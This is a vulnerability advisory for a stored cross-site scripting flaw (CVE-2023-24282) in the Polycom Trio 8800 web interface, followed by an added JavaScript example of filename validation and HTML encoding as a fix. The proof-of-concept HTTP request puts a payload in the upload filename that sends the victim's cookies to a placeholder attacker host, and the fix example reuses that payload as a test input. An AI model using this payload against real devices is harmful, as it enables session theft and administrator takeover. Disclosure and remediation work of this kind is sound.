Stored Cross Site Scripting (CVE-2023-24282):
POST /form-submit/Preferences/Ringtone/upload HTTP/1.1
Host: 10.26.222.125
Cookie: session=00000003-JL7azBc2p7bexJaAKqvCYVCG15HubMz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------109391813519434785531297386274
Content-Length: 24321
Origin: https://10.26.222.125
Referer: https://10.26.222.125/index.htm
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------109391813519434785531297386274
Content-Disposition: form-data; name="383:2"; filename="'><img src=1 onerror=this.src='http:\x2F\x2FAttacker-IP\x2F?c='+document.cookie>.wav"
Content-Type: audio/x-wav

RIFF WAVEfmt
…SNIP…
Vulnerability Type:
Cross Site Scripting (XSS)
Vendor of Product:
Polycom
Affected Product Code Base:
Trio 8800 - 7.2.2.1094
Affected Component:
Web Management Interface
Description:
The Web Management Interface of Polycom Trio 8800 was discovered to
contain a stored cross-site scripting vulnerability. This vulnerability allows
injection of arbitrary JavaScript and administrator takeover.
Attack Vectors:
A remote authenticated attacker can inject malicious JavaScript code by sending a specially crafted request to the Polycom Trio's ringtone management endpoint.
Attack Type:
Remote
Impact Code execution:
false
Impact Escalation of Privileges:
true
Impact Information Disclosure:
true
19/01/23 - initial contact disclosure
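
Added example, not part of the original advisory and not Polycom's code: one way a web management interface can handle the uploaded filename so the request above stays inert, by allow-listing the name at upload and HTML-encoding it at render time. The function names, the allow-list policy and the <option> markup are assumptions; the advisory does not say how the device renders the ringtone list.

```javascript
// Hypothetical server-side handling of an uploaded ringtone name.
// All names and the allow-list policy here are assumptions for illustration.

// Encode the five characters that can end a text node or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept only plain names: letters, digits, space, dot, dash, underscore,
// ending in .wav. Returns the bare file name, or null to reject the upload.
function validateRingtoneName(filename) {
  if (typeof filename !== "string") return null;
  const base = filename.split(/[\\/]/).pop(); // drop any client-supplied path
  return /^[A-Za-z0-9][A-Za-z0-9 ._-]{0,59}\.wav$/i.test(base) ? base : null;
}

// Render one list entry. The name is encoded even though it was validated on
// upload, so entries stored before the check existed are still rendered inert.
function renderRingtoneOption(storedName) {
  const safe = escapeHtml(storedName);
  return "<option value='" + safe + "'>" + safe + "</option>";
}

// Constructed inputs: the filename from the request above and a benign one.
const hostile = String.raw`'><img src=1 onerror=this.src='http:\x2F\x2FAttacker-IP\x2F?c='+document.cookie>.wav`;
const benign = "Office Chime_2.wav";

console.log("hostile accepted as:", validateRingtoneName(hostile));
console.log("benign accepted as: ", validateRingtoneName(benign));
console.log("legacy entry renders:", renderRingtoneOption(hostile));
```

Either control alone leaves a gap: validation does nothing for names already stored, and encoding alone still lets arbitrary strings into storage where another page may render them unencoded.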